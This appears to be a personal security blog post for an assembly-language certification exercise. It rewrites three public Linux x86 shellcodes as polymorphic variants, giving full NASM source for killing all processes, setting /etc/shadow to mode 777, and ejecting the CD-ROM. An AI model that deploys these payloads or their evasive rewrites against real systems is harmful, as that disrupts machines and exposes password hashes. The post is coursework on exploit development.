danielsauder

IT security is a matter of trust.

SLAE Assignment 6: Polymorphic Shellcode

This assignment is about writing polymorphic versions of shellcodes downloaded by shell-storm.org.

Kill all Processes Shellcode

I want to start with a simple one, a shellcode for killing processes which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php.
Here is the original assembler code:

killall_orig.nasm

section .text

      global _start

_start:
; kill(-1, SIGKILL)

     push byte 37
     pop eax
     push byte -1
     pop ebx
     push byte 9
     pop ecx
     int 0x80

And this is my version:

killall.nasm

section .text

      global _start

_start:
; kill(-1, SIGKILL)

     xor ecx, ecx
     mul ecx
     mov al, byte 37
     dec ebx
     mov cl, byte 9
     int 0x80

The shellcode has the same size like the original shellcode.

chmod /etc/shadow 777

The second example is a shellcode that executes chmod 777 on /etc/shadow. The original code can be found at http://www.shell-storm.org/shellcode/files/shellcode-590.php.
Here is the original code as in the intel syntax:

chmod_orig.nasm

section .text

      global _start

_start:
      xor eax, eax
      push eax
      mov al, 0xf
      push 0x776f6461
      push 0x68732f63
      push 0x74652f2f
      mov ebx, esp
      xor ecx, ecx
      mov cx, 0x1ff
      int 0x80
      inc eax
      int 0x80

And here is my version of the code. I used the JMP-CALL-POP technique to change the code.

chmod.nasm

section .text

global _start

_start:
	jmp short call_shellcode
      
shellcode:
	pop ebx
	xor ecx, ecx
	mul ecx
	mov al, 0xf	
	mov cx, 0x1ff
	int 0x80
 	inc eax	
 	int 0x80	

	
call_shellcode:
	call shellcode
	message db "/etc/shadow"

The original shellcode has a size of 33 bytes, mine is 34 bytes long.

Eject cdrom

The original shellcode can be found at http://www.shell-storm.org/shellcode/files/shellcode-563.php.
And here it is:

cdrom_orig.nasm

; linux/x86 eject /dev/cdrom 42 bytes
; root@thegibson
; 2010-01-08
 
section .text
    global _start
 
_start:
    ; open("/dev/cdrom", O_RDONLY | O_NONBLOCK);
    mov al, 5
    cdq
    push edx
    push word 0x6d6f
    push dword 0x7264632f
    push dword 0x7665642f
    mov ebx, esp
    mov cx, 0xfff
    sub cx, 0x7ff
    int 0x80
 
    ; ioctl(fd, CDROMEJECT, 0);
    mov ebx, eax
    mov al, 54
    mov cx, 0x5309
    cdq
    int 0x80

And here is my version:

cdrom.nasm

section .text

global _start

_start:
	jmp short call_shellcode
      
shellcode:
	; open("/dev/cdrom", O_RDONLY | O_NONBLOCK);
 	pop ebx
 	xor ecx, ecx
 	xor eax, eax
 	mov al, 5 
	mov cx, 0xfff
	sub cx, 0x7ff
	int 0x80	

	; ioctl(fd, CDROMEJECT, 0);
	cdq
	mov ebx, eax
	mov al, 53
	inc eax
	mov cx, 0x5309
	int 0x80	
	
	; exit
	mov al, 1
	xor ebx, ebx
	int 0x80
	
call_shellcode:
	call shellcode
	message db "/dev/cdrom"

As in the previous example I used JMP-CALL-POP for changing the code. Furthermorre I changed order of the instructions and changed a value and incremented it afterwards. Also I added the exit function, which was not necessary in the previous example.
Size of the original shellcode is 42 bytes, mine is 53 bytes long.

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

Published by

Daniel

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: